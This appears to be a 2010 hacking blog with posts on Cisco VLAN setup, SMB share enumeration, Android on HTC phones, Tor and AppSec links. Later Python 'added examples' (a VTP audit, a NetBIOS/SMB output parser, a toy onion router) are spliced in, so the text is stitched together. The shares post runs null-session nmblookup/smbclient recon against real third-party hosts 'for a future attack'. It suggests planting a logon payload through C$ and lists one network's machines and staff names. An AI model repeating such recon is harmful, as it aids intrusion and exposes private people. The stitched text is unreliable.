Tuesday, November 2, 2010

Configure Cisco Router

Well, this is going to be a two-part hack. In this first part I configured a Cisco switch (a Catalyst 3500 XL) with three VLANs: the default VLAN 1 plus two new ones, VLAN 2 and VLAN 3. I'll be using the two new VLANs. The console session is below; please look at the config if you have any questions.

Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]: no
Press RETURN to get started.


Switch>en
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int
% Incomplete command.

Switch(config)#
Switch(config)#interface ?
FastEthernet FastEthernet IEEE 802.3
GigabitEthernet GigabitEthernet IEEE 802.3z
Multilink Multilink-group interface
Port-channel Ethernet Channel of interfaces
VLAN Switch VLAN Virtual Interface
Virtual-TokenRing Virtual TokenRing

Switch(config)#interface
% Incomplete command.

Switch(config)#interface Fast
Switch(config)#interface FastEthernet0/1
Switch(config-if)#?
Interface configuration commands:
  arp                     Set arp type (arpa, probe, snap) or timeout
  bandwidth               Set bandwidth informational parameter
  carrier-delay           Specify delay for interface transitions
  cdp                     CDP interface subcommands
  custom-queue-list       Assign a custom queue list to an interface
  default                 Set a command to its defaults
  delay                   Specify interface throughput delay
  description             Interface specific description
  duplex                  Configure duplex operation.
  exit                    Exit from interface configuration mode
  fair-queue              Enable Fair Queuing on an Interface
  help                    Description of the interactive help system
  hold-queue              Set hold queue depth
  keepalive               Enable keepalive
  load-interval           Specify interval for load calculation for an interface
  logging                 Configure logging for interface
  loopback                Configure internal loopback on an interface
  mac-address             Manually set interface MAC address
  max-reserved-bandwidth  Maximum Reservable Bandwidth on an Interface
  media-type              Interface media type
  mtu                     Set the interface Maximum Transmission Unit (MTU)
  mvr                     MVR per port configuration
  negotiation             Select Autonegotiation mode
  no                      Negate a command or set its defaults
  port                    Perform switch port configuration
  power                   power configuration
  priority-group          Assign a priority group to an interface
  random-detect           Enable Weighted Random Early Detection (WRED) on an Interface
  rmon                    Configure Remote Monitoring on an interface
  service-policy          Configure QoS Service Policy
  shutdown                Shutdown the selected interface
  snmp                    Modify SNMP interface parameters
  spanning-tree           Spanning Tree Subsystem
  speed                   Configure speed operation.
  switchport              Set switching mode characteristics
  timeout                 Define timeout values for this interface
  transmit-interface      Assign a transmit interface to a receive-only interface
  tx-queue-limit          Configure card level transmit queue limit
  udld                    Configure UDLD enabled or disabled and ignore global UDLD setting

Switch(config-if)#^Z
Switch#
00:13:29: %SYS-5-CONFIG_I: Configured from console by console
Switch#show vtp status
VTP Version                     : 2
Configuration Revision          : 0
Maximum VLANs supported locally : 254
Number of existing VLANs        : 5
VTP Operating Mode              : Server
VTP Domain Name                 :
VTP Pruning Mode                : Disabled
VTP V2 Mode                     : Disabled
VTP Traps Generation            : Disabled
MD5 digest                      : 0xBF 0x86 0x94 0x45 0xFC 0xDF 0xB5 0x70
Configuration last modified by 0.0.0.0 at 0-0-00 00:00:00
Switch#show vlan

VLAN Name                             Status    Ports
---- -------------------------------- --------- -------------------------------
1    default                          active    Fa0/1, Fa0/2, Fa0/3, Fa0/4,
                                                Fa0/5, Fa0/6, Fa0/7, Fa0/8,
                                                Fa0/9, Fa0/10, Fa0/11, Fa0/12,
                                                Fa0/13, Fa0/14, Fa0/15, Fa0/16,
                                                Fa0/17, Fa0/18, Fa0/19, Fa0/20,
                                                Fa0/21, Fa0/22, Fa0/23, Fa0/24,
                                                Gi0/1, Gi0/2
1002 fddi-default                     active
1003 token-ring-default               active
1004 fddinet-default                  active
1005 trnet-default                    active

VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1    enet  100001     1500  -      -      -        -    -        1002   1003
1002 fddi  101002     1500  -      -      -        -    -        1      1003
1003 tr    101003     1500  1005   0      -        -    srb      1      1002
1004 fdnet 101004     1500  -      -      1        ibm  -        0      0
1005 trnet 101005     1500  -      -      1        ibm  -        0      0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 2 name test
VLAN 2 added:
Name: test
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#show vlan

VLAN Name                             Status    Ports
---- -------------------------------- --------- -------------------------------
1    default                          active    Fa0/1, Fa0/2, Fa0/3, Fa0/4,
                                                Fa0/5, Fa0/6, Fa0/7, Fa0/8,
                                                Fa0/9, Fa0/10, Fa0/11, Fa0/12,
                                                Fa0/13, Fa0/14, Fa0/15, Fa0/16,
                                                Fa0/17, Fa0/18, Fa0/19, Fa0/20,
                                                Fa0/21, Fa0/22, Fa0/23, Fa0/24,
                                                Gi0/1, Gi0/2
2    test                             active
1002 fddi-default                     active
1003 token-ring-default               active
1004 fddinet-default                  active
1005 trnet-default                    active

VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1    enet  100001     1500  -      -      -        -    -        1002   1003
2    enet  100002     1500  -      -      -        -    -        0      0
1002 fddi  101002     1500  -      -      -        -    -        1      1003
1003 tr    101003     1500  1005   0      -        -    srb      1      1002
1004 fdnet 101004     1500  -      -      1        ibm  -        0      0
1005 trnet 101005     1500  -      -      1        ibm  -        0      0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 3 name test2
VLAN 3 added:
Name: test2
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int vlan2
Switch(config-subif)#management
Switch(config-subif)#
Switch#
00:19:43: %SYS-5-CONFIG_I: Configured from console by console
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int fa
Switch(config)#int fastEthernet 0/5
Switch(config-if)#switchport access vlan2
                                   ^
% Invalid input detected at '^' marker.

Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#inter
Switch(config)#interface fast
Switch(config)#interface fastEthernet 0/6
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/7
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/10
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/11
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/12
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#end
Switch#write memorey
00:23:15: %SYS-5-CONFIG_I: Configured from console by console
             ^
% Invalid input detected at '^' marker.

Switch#write memory
Building configuration...
[OK]
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/8, Fa0/9, Fa0/13, Fa0/14,
Fa0/15, Fa0/16, Fa0/17, Fa0/18,
Fa0/19, Fa0/20, Fa0/21, Fa0/22,
Fa0/23, Fa0/24, Gi0/1, Gi0/2
2 test active Fa0/5, Fa0/6, Fa0/7
3 test2 active Fa0/10, Fa0/11, Fa0/12
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#
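A check worth running against output like the above, as an added example that is not part of the original post. The `show vtp status` output shows the switch in VTP Server mode with an empty domain name and no VTP password. In that state the switch inherits the domain name from the first VTP advertisement it receives over a trunk, and any server in that domain with a higher configuration revision can overwrite its VLAN database; `vtp mode transparent` (or a real domain name plus `vtp password`) closes that hole. The script below parses `show vtp status` and the first table of `show vlan` (port lists wrap onto continuation lines, as they do above) and reports those findings plus the ports left in VLAN 1. The sample text is constructed to mirror the session above, not captured from the switch.

```python
import re

# Constructed sample output, modelled on the console session in this post (not a capture).
VTP_STATUS = """\
VTP Version                     : 2
Configuration Revision          : 0
Maximum VLANs supported locally : 254
Number of existing VLANs        : 7
VTP Operating Mode              : Server
VTP Domain Name                 :
VTP Pruning Mode                : Disabled
VTP V2 Mode                     : Disabled
VTP Traps Generation            : Disabled
MD5 digest                      : 0xBF 0x86 0x94 0x45 0xFC 0xDF 0xB5 0x70
Configuration last modified by 0.0.0.0 at 0-0-00 00:00:00
"""

SHOW_VLAN = """\
VLAN Name                             Status    Ports
---- -------------------------------- --------- -------------------------------
1    default                          active    Fa0/1, Fa0/2, Fa0/3, Fa0/4,
                                                Fa0/8, Fa0/9, Fa0/13, Fa0/14,
                                                Fa0/15, Fa0/16, Fa0/17, Fa0/18,
                                                Fa0/19, Fa0/20, Fa0/21, Fa0/22,
                                                Fa0/23, Fa0/24, Gi0/1, Gi0/2
2    test                             active    Fa0/5, Fa0/6, Fa0/7
3    test2                            active    Fa0/10, Fa0/11, Fa0/12
1002 fddi-default                     active
1003 token-ring-default               active
1004 fddinet-default                  active
1005 trnet-default                    active

VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1    enet  100001     1500  -      -      -        -    -        1002   1003
"""


def parse_vtp_status(text):
    """Map the 'Key : Value' lines of `show vtp status` to a dict; empty values stay ''."""
    status = {}
    for line in text.splitlines():
        if ":" not in line or line.startswith("Configuration last modified"):
            continue  # the timestamp line has colons but is not a key/value pair
        key, _, value = line.partition(":")
        status[key.strip()] = value.strip()
    return status


VLAN_ROW = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_show_vlan(text):
    """Return {vlan_id: {name, status, ports}} from the first table of `show vlan`.

    IOS wraps long port lists onto indented continuation lines; those belong to
    the VLAN row above them. The blank line before the second table ends parsing.
    """
    vlans, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            if vlans:
                break
            continue
        if line.startswith(("VLAN", "----")):
            continue  # column headings and rules
        m = VLAN_ROW.match(line)
        if m:
            current = vlans[int(m.group(1))] = {
                "name": m.group(2), "status": m.group(3), "ports": []}
            port_text = m.group(4)
        elif line[0].isspace() and current is not None:
            port_text = line  # continuation of the previous row's port list
        else:
            continue
        current["ports"].extend(p.strip() for p in port_text.split(",") if p.strip())
    return vlans


def audit(vtp, vlans):
    """Findings a reviewer would raise against this switch state (plain strings)."""
    findings = []
    mode = vtp.get("VTP Operating Mode", "")
    if mode == "Server" and not vtp.get("VTP Domain Name"):
        findings.append("VTP server with empty domain name: the switch joins the first "
                        "VTP domain advertised on a trunk")
    if mode in ("Server", "Client"):
        findings.append("VTP mode is not transparent: a neighbour with a higher "
                        "configuration revision can overwrite the VLAN database")
    idle = vlans.get(1, {}).get("ports", [])
    if idle:
        findings.append("%d ports still in VLAN 1 (default), e.g. %s: move unused ports "
                        "to a dead VLAN and shut them down" % (len(idle), ", ".join(idle[:4])))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_vtp_status(VTP_STATUS), parse_show_vlan(SHOW_VLAN)):
        print("-", finding)
```

Paste real `show vtp status` and `show vlan` output into the two strings (or read them from files) to run it against a switch you manage; the parser only relies on the column layout IOS prints.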

Remote shares



I came across this while googling for exploits, and it's really good for recon. NetBIOS name lookups go over UDP port 137, and the share listing that follows uses the NetBIOS session service on TCP port 139. So you need to find the NetBIOS name of the target computer, and Microsoft makes this very easy. Once you find a target with 139 open, issue the following command.

$nmblookup -A 12.***.58.154

The -A switch asks for a node status of the host at that IP address, i.e. a dump of its NetBIOS name table. You will get some output along the lines of:

Looking up status of 12.***.58.154
BROOKS <00> - M
ARROWSIGN <00> - M
BROOKS <20> - M
ARROWSIGN <1e> - M

MAC Address = 00-C0-A8-83-19-5D

So now we have a NetBIOS name, "BROOKS". The suffix in angle brackets tells you what each entry is: <00> is the workstation (host) name, <20> means the file server service is running, so shares are being offered, and the ARROWSIGN entries are the workgroup or domain. To follow this up, we are going to run the following command.

$smbclient -LBROOKS -I 12.***.58.154
Password:
Domain=[ARROWSIGN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
SharedDocs Disk
print$ Disk Printer Drivers
ADMIN$ Disk Remote Admin
C$ Disk Default share
Domain=[ARROWSIGN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------

I just hit return for the password (a null session) and it shows a list of shares on that machine. The banner's "Windows 5.1" is Windows XP. C$ is my favorite share; that's why I posted this example. C$ is the administrative share for the whole C:\ drive, so with access to it you have the whole drive and can drop a payload that starts at logon etc. Keep in mind that the null session only lists the share: actually connecting to C$ or ADMIN$ requires administrator credentials on the target, so the listing tells you the box is worth going after, not that you are already in.

Like I said before, I just use this technique for information gathering for a future attack. Here is another example of the kind of information you can get from this (the "Windows 5.0" banner here is Windows 2000).

$ smbclient -LWEBSERVER -I 12.***.54.11
Password:
Anonymous login successful
Domain=[LORETTO] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
Anonymous login successful
Domain=[LORETTO] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------
ARAMIREZ
BUFFY Buffy Computer
BUSINESSSERVER
CHOFFMAN2
CHOFFMANN Cindy Hoffmann
CPELL
CSANTOYO
DESTINEYELELAB1
DESTINEYELEMLAB
DMUNOZ
ELEMPRINCIPAL IBM 2003_25
ELEMRECEP IBM2003_#29
ELEM_LIBRARY
EMATA
FAMNET
FESERVER
IPORTILLO
KIMPELL2 Dianne Kimpell
LMIRANDA
LORETTO2
LORETTO2A
MATA
NNIETO Teacher Computer
PHERRERA2 Patty Herrera
POLIVAS Patso Olivas
PRYHERD Teacher Computer
PS-55DAE6
RECORDS
RENRIQUEZ
SASI
SPACE
SVR-APP02
SVR-PDC
TEC2
WEBSERVER

Workgroup Master
--------- -------
101 TEACHER101
LORETTO SVR-PDC
WORKGROUP SPAREIBM

This tells you pretty much all the computers on the network, the domain and other trusted domains, and the master browser for each workgroup (the line "LORETTO SVR-PDC" says SVR-PDC is the master browser for the LORETTO domain, and in an NT-style domain that role normally sits on the PDC, so it also points you at the domain controller). Very useful information gathering; it's essentially a map of someone's LAN.

Enjoy
-Sumit-
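To make the output above easier to act on, here is an added example (my own code, not part of the original post) that parses `nmblookup -A` and `smbclient -L` output and decodes the NetBIOS suffixes. The suffix is what carries the role: <00> unique is the host name, <00> group the workgroup or domain, <20> the file server service, <1b> the domain master browser (the PDC in an NT-style domain), <1c> group the domain controllers. The sample text is constructed to mirror the transcripts above, with placeholder IPs and a made-up name table for a domain controller; the real tools also print a <GROUP> marker and a node type letter, which the transcript above lost.

```python
import re

# Constructed samples modelled on the transcripts in this post (placeholder IPs, not live captures).
NMB_STATUS = """\
Looking up status of 192.0.2.10
\tBROOKS          <00> -         M <ACTIVE>
\tARROWSIGN       <00> - <GROUP> M <ACTIVE>
\tBROOKS          <20> -         M <ACTIVE>
\tARROWSIGN       <1e> - <GROUP> M <ACTIVE>

\tMAC Address = 00-C0-A8-83-19-5D
"""

# What a domain controller's name table looks like (constructed; SVR-PDC/LORETTO are the
# names from the second transcript, the entries are invented for illustration).
NMB_STATUS_DC = """\
Looking up status of 192.0.2.20
\tSVR-PDC         <00> -         M <ACTIVE>
\tLORETTO         <00> - <GROUP> M <ACTIVE>
\tSVR-PDC         <20> -         M <ACTIVE>
\tLORETTO         <1c> - <GROUP> M <ACTIVE>
\tSVR-PDC         <1b> -         M <ACTIVE>
\tLORETTO         <1e> - <GROUP> M <ACTIVE>

\tMAC Address = 00-00-5E-00-53-01
"""

SMB_LIST = """\
Domain=[ARROWSIGN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

\tSharename       Type      Comment
\t---------       ----      -------
\tIPC$            IPC       Remote IPC
\tSharedDocs      Disk
\tprint$          Disk      Printer Drivers
\tADMIN$          Disk      Remote Admin
\tC$              Disk      Default share
"""

SMB_DENIED = """\
Anonymous login successful
Domain=[LORETTO] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

\tSharename       Type      Comment
\t---------       ----      -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
"""

# (suffix, is_group) -> meaning, for the suffixes that matter during recon.
SUFFIXES = {
    ("00", False): "Workstation service (host name)",
    ("00", True): "Workgroup / domain name",
    ("03", False): "Messenger service",
    ("1b", False): "Domain Master Browser (normally the PDC)",
    ("1c", True): "Domain Controllers group",
    ("1d", False): "Master Browser for this subnet",
    ("1e", True): "Browser service elections",
    ("20", False): "File Server service (shares are offered)",
}

STATUS_LINE = re.compile(r"^\s*(\S+)\s+<([0-9a-fA-F]{2})>\s+-\s+(<GROUP>)?\s*([BPMH])")


def decode_node_status(text):
    """Parse `nmblookup -A` output into (name, suffix, is_group, role) tuples plus the MAC."""
    entries, mac = [], None
    for line in text.splitlines():
        m = STATUS_LINE.match(line)
        if m:
            name, suffix, group = m.group(1), m.group(2).lower(), bool(m.group(3))
            entries.append((name, suffix, group, SUFFIXES.get((suffix, group), "unknown suffix")))
        elif "MAC Address" in line:
            mac = line.split("=", 1)[1].strip()
    return entries, mac


def summarise(entries):
    """The facts an attacker or defender actually wants from a name table."""
    facts = {"host": None, "domain": None, "file_server": False, "domain_controller": False}
    for name, suffix, group, _ in entries:
        if suffix == "00" and not group:
            facts["host"] = name
        elif suffix == "00" and group:
            facts["domain"] = name
        elif suffix == "20":
            facts["file_server"] = True
        elif suffix == "1b" or (suffix == "1c" and group):
            facts["domain_controller"] = True
    return facts


def parse_share_list(text):
    """Rows of the Sharename table from `smbclient -L`; [] if the browse list was denied."""
    shares, in_table = [], False
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("Sharename"):
            in_table = True
        elif in_table and s.startswith("---"):
            continue
        elif in_table:
            if not s or s.startswith("Error returning browse list"):
                break
            parts = s.split(None, 2)
            shares.append((parts[0], parts[1], parts[2] if len(parts) > 2 else ""))
    return shares


def hidden_shares(shares):
    """Administrative ($-suffixed) disk shares: visible to a null session, usable only with admin creds."""
    return [name for name, kind, _ in shares if name.endswith("$") and kind == "Disk"]
```

Feed it the real output of `nmblookup -A <ip>` and `smbclient -L <name> -I <ip> -N` (`-N` skips the password prompt you would otherwise answer with Enter); `summarise` then tells you at a glance whether the host is a file server or a domain controller.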

Installing Android on HTC Touch


Interested in Android but think you need to buy a new phone to try it out? Actually, your Windows Mobile phone may already have the capability of running Android. Today we show you how and the type of phone you’ll need.
Installing Android
To run Android you will need a microSD card that is not SDHC (so 2 GB or smaller) and a supported Windows Mobile phone (see below). You can check whether your microSD card is SDHC by looking for the "HC" label on the card.
The microSD card will need to be formatted in FAT32. Plug the microSD card into the computer and right click on it and choose format.
Note: Formatting a microSD drive will erase everything on that drive. Make sure you have any important files backed up before you format it.
Now that the microSD card is formatted, the first step to installing Android is finding the right Android port for your phone (see below). You will need to find the port that works on your phone as well as the version of Android you want to run. Versions start at 1.0 but typically you will find ports for version 1.6 or 2.1.
Once you have found the right port for your phone and Android version you want to use, extract the files to a folder using 7-zip.
After the files have extracted there should be a folder called “andboot”. Go into the andboot folder and there will be another folder called “startup config” or “startup”. Open this folder and you will need to find the right startup.txt file for your phone. Inside each folder will be a single “startup.txt” file. Copy the file for your phone model to the root of the andboot folder. This file will tell Android what type of hardware you have, how big your screen is, how much RAM your phone has etc. so it is very important to choose the right file. If you are confused on what these phone names are please read below on finding your phone model.
Once you have moved the correct startup.txt file to the andboot folder, copy the entire andboot folder to the root of your newly formatted microSD card.
Plug the microSD card back in the phone and open the file browser on your phone and browse to the memory card. Make sure the phone is plugged into power before the next few steps because on some phones running on battery may cause the phone to hang.
Open the andboot folder and run haret.exe. If the right startup.txt file is in the root of the andboot folder you should be able to click “Run” and you will get a quick loading screen while haret turns off Windows Mobile and starts up Android.
You should get some scrolling text and probably a nice Android logo while the phone boots up the first time.
Note: The first boot is going to take a considerably longer time than subsequent boots. and you may need to calibrate your screen during the boot process so make sure you keep an eye on it.
Once the basic Linux settings are done your new “Android” phone will boot to a welcome screen so you can walk through the rest of the settings like setting up your email account.
Tip: If you are running Android on a phone that does not have an active data plan but does have wifi, you can get around the startup screen by tapping on the welcome screen in this order: top left corner, top right corner, bottom right corner, bottom left corner then tap the Android logo. You can then enable wifi and join a network and set up your gmail account manually.
It is usually recommended that you leave your phone alone while it syncs your information for at least 10 minutes. Once the initial syncing is done the phone should start running faster and you can play around with installing apps. If you don’t wait for the phone to fully sync you may have problems with apps crashing prematurely and a force close dialog popping up.
Change any settings and install any apps you want, they will be saved to your memory card and ready on next boot. All phones that run Android from the microSD card will automatically boot Windows Mobile when the phone restarts. To run Android again, just open the file browser and run haret.exe again.
Android Ports
There are a few different Android ports for Windows Mobile devices and each one supports a different family of device; each family of device has a varying amount of hardware support. Most phones will support the touch screen, hardware buttons, cell phone radio, and data connection, but some ports may not support bluetooth, GPS, or power management. This is not a complete list of Android ports available, but it should cover the most popular Windows Mobile phones.
Almost all Android development on Windows Mobile phones started with development on the HTC Touch (also known as the HTC Vogue and the Verizon xv6900). The HTC Touch has 100% of the hardware features working, and even some features that were not available in official Windows Mobile ROMs. One of the main differences between Android for the Touch and Android for every other phone is that the Touch allows Android to be flashed to the phone's ROM (NAND memory). This was a big breakthrough for Android development and has greatly increased battery life and speed. Running Android on the Touch can be done by following the steps above, but it is recommended to run Android by flashing the phone's NAND memory. To learn how to do that, start at the Android Touch FAQ thread at XDA-Developers.
Android ports for the HTC Touch can also be used on the following phones with varying success.
  • HTC Nike (Neon)
  • HTC Polaris (Touch Cruise)
  • HTC Kaiser (TyTN II)
  • HTC Titan (Mogul, xv6800)
Note: HTC phones all have proper names that come from HTC and in many cases each carrier will give the phone its own branding and rename the phone to something else. For example, the HTC Titan was called the Mogul on Sprint and the xv6800 on Verizon. To find the Android port for your phone, start by finding the proper HTC name of your device. Start on HTC’s site to discover your device’s official name.
XDAndroid supports the most popular touch screen HTC Windows Mobile phones, and if you bought a touch screen HTC Windows Mobile phone within the past year, this port will most likely support it. XDAndroid runs directly from the phone's microSD memory card on the following phones:
  • Touch Pro (Fuze, RAPH, RAPH800, RAPH500)
  • Touch Diamond (DIAMOND, DIAM500)
  • Touch HD (BLACKSTONE)
  • GSM Touch Pro2 (TILT2,RHODIUM, RHOD400, RHOD500)
  • GSM Touch Diamond2 (TOPAZ)
Andromnia is an Android port for Samsung devices. Currently this port is in the pre-alpha stage and things like the headset speaker do not work. But if you want to test it out, it supports the following phones:
  • Samsung i900 (GSM, supported worldwide)
  • Samsung i910 (CDMA, used by Verizon in the US)
  • Samsung i780 (Mirage)
  • Samsung i907 (AT&T Epix)
Wing Linux isn’t as quickly developed as XDAndroid but should get the job done if your phone isn’t supported by any other port. Wing Linux supports the following phones to varying degrees:
  • HTC Artemis
  • HTC Elf, HTC Elfin
  • HTC Excalibur, T-Mobile Dash
  • HTC Gene, HTC P3400
  • HTC Herald, T-Mobile Wing
  • HTC Opal, HTC Touch Viva
  • HTC Pharos
  • HTC Prophet
  • HTC Startrek
  • HTC Wizard
  • Asus P320, Galaxi Mini
You may also want to look at threads for the following phones to check the status of Android on these phones.
Extra links
If you still can’t find what you are looking for I recommend checking out these links for more information.

How to surf web anonymously with TOR



Many of us use proxies to stay anonymous on the internet. Let's quickly look at what we are actually doing when we use a proxy: we first connect to a proxy server, which fetches the resources we request from the web server on our behalf.

Thus a proxy server hides our identity by acting as an intermediary between us and the web server we are accessing. Suppose we break into a server through a proxy, thinking we are anonymous. If the owner of the web server starts asking about the clients that connected through that proxy, the proxy's operators can reveal our identity, because they hold the logs that tie our IP address to the request. This means we can't actually rely on a single proxy server for anonymity. This is where onion routing, as implemented by Tor (The Onion Router), comes into the picture. With Tor, client traffic passes through three different servers (relays, or nodes) before reaching the actual web server, and each relay only sees the hop before it and the hop after it. The path may be any three nodes, chosen at random.

Let's consider that it has taken the path shown by the green arrows in the diagram, through Node 1, Node 5 and Node 9. Now:

* Node 1 knows the actual origin (the client) but not the actual destination (the web server).
* Node 5 knows neither the actual origin nor the actual destination.
* Node 9 knows the actual destination but not the actual origin.

Thus no single node knows which client is accessing which web server, which is what gives Tor its anonymity. One caveat: Node 9, the exit node, sends the request to the web server on your behalf, so it sees the request content in the clear unless the connection itself is encrypted (HTTPS). Tor hides who you are, not what you send.
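To make the three-node argument concrete, here is an added toy onion construction (my own illustration, not Tor's code or protocol). It assumes each relay shares a random key with the client; real Tor negotiates those keys hop by hop with a Diffie-Hellman handshake and uses AES, whereas this toy uses a SHA-256-derived XOR keystream with an HMAC tag so it runs on the standard library alone. The `route` function plays the three relays in turn and records what each one could learn, and the exit relay ends up holding the plaintext request, which is the caveat above.

```python
import hashlib
import hmac
import os

# Toy onion routing to illustrate the post's three-node argument. Assumptions (not Tor's
# protocol): each relay shares a random key with the client, and the per-layer cipher is a
# SHA-256-derived XOR keystream with an HMAC-SHA256 tag instead of Tor's AES plus DH handshake.


def keystream(key, nonce, length):
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def seal(key, plaintext):
    """nonce || tag || ciphertext; the tag stops a relay from tampering undetected."""
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + tag + ct


def unseal(key, blob):
    nonce, tag, ct = blob[:16], blob[16:48], blob[48:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("wrong key or tampered layer")
    return bytes(a ^ b for a, b in zip(ct, keystream(key, nonce, len(ct))))


def build_onion(path, destination, payload):
    """path = [(relay_name, key), ...] from entry to exit. Wraps the payload innermost-first;
    each layer carries only the next hop's name (hop names must not contain NUL bytes),
    so a relay that strips its layer learns nothing beyond where to forward."""
    hops = [name for name, _ in path] + [destination]
    blob = payload
    for i in range(len(path) - 1, -1, -1):
        blob = seal(path[i][1], hops[i + 1].encode() + b"\x00" + blob)
    return blob


def peel(key, blob):
    """A relay's only operation: strip its layer, read the next hop, forward the rest."""
    plain = unseal(key, blob)
    next_hop, _, rest = plain.partition(b"\x00")
    return next_hop.decode(), rest


def can_peel(key, blob):
    """True if this key opens the outermost layer (a middle relay cannot open the entry layer)."""
    try:
        peel(key, blob)
        return True
    except ValueError:
        return False


def route(path, onion, source):
    """Forward the onion hop by hop. Returns each relay's view (name, came_from, goes_to)
    and the bytes the exit relay finally hands to the destination."""
    views, prev, blob = [], source, onion
    for name, key in path:
        next_hop, blob = peel(key, blob)
        views.append((name, prev, next_hop))
        prev = name
    return views, blob


def demo():
    path = [("node1", os.urandom(32)), ("node5", os.urandom(32)), ("node9", os.urandom(32))]
    onion = build_onion(path, "webserver", b"GET / HTTP/1.0\r\n\r\n")
    return route(path, onion, "client")


if __name__ == "__main__":
    views, delivered = demo()
    for view in views:
        print("%s sees: from %s, to %s" % view)
    print("exit delivers:", delivered)
```

Run it and the three printed lines are exactly the bullets above: node1 sees client and node5, node5 sees node1 and node9, node9 sees node5 and the web server, and node9 also holds the plaintext request.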

Installing and using Tor

Step 1. Download the Tor client (the Vidalia bundle) from the link below and run the setup. Prefer the official download from torproject.org over a file-hosting mirror such as this one, and verify the package signature; a tampered Tor bundle gives away exactly what you installed it to protect.

http://www.ziddu.com/download/12331095/vidalia-bundle-0.2.1.26-0.2.10-1.exe.html

Note: To use Tor from the browser you need to install the Mozilla Firefox add-on (Torbutton) that is included in the package you downloaded.

Step 2. Open the 'Vidalia Control Panel' from the task bar and click 'Start Tor'.

Step 3. Now open the Mozilla Firefox browser and single-click the red 'Tor Disabled' indicator in the right corner of the browser; it will turn into a green 'Tor Enabled'.

Now visit 'www.whatismyip.com' and you will see a new public IP address. It will keep changing over time as Tor builds new circuits, each taking a different random path through three nodes.

Monday, October 25, 2010

Best of Application Security


Ten of Application Security industry's coolest, most interesting, important, and entertaining links from the past week -- in no particular order.

WASC Threat Classification to OWASP Top Ten RC1 Mapping


Update 01.05.2009: From feedback received, added some TCv2 classes that also map.

With most of the work done by Bil Corry (@bilcorry), here is a solid first pass at creating a mapping between the newly released WASC Threat Classification v2 and OWASP's Top Ten 2010 RC1. This should help those actively using one or both of these documents.

To disable IE8's XSS Filter or not?

Since this article was published, Major IE8 flaw makes 'safe' sites unsafe, I’ve fielded a number of inquiries asking for guidance. Should they follow Google’s lead and proactively disable IE8’s XSS Filter (X-XSS-Protection: 0) until a patch is made available or leave it enabled? Without getting into any technical detail, here are my thoughts on the matter:

If your organization is REALLY concerned about XSS attacks, is VERY confident the website in question is one of the very few completely free from XSS issues (as apparently Google is), and is prepared to fix any XSS issues that surface within DAYS -- then you may consider disabling the XSS Filter to reduce any remaining attack surface until a patch arrives.

On the other hand if you are like most who have XSS, or don't know if they do or not, then leave the XSS Filter alone to do its job -- give your IE8 users a fighting chance.

In the absence of a security strategy


From experience working with all manner of organizations there are a number of unique security strategies present in the industry. Since every business operates differently, perhaps there is no right or wrong approach. That is, as long as the approach is properly aligned with the goals of the business. If not, the end result will lead to failure and in my opinion represents one of the largest, if not the largest, challenges presently facing the industry. That along with “justification,” which is probably the same thing.

Here are the strategies I’ve managed to identify:

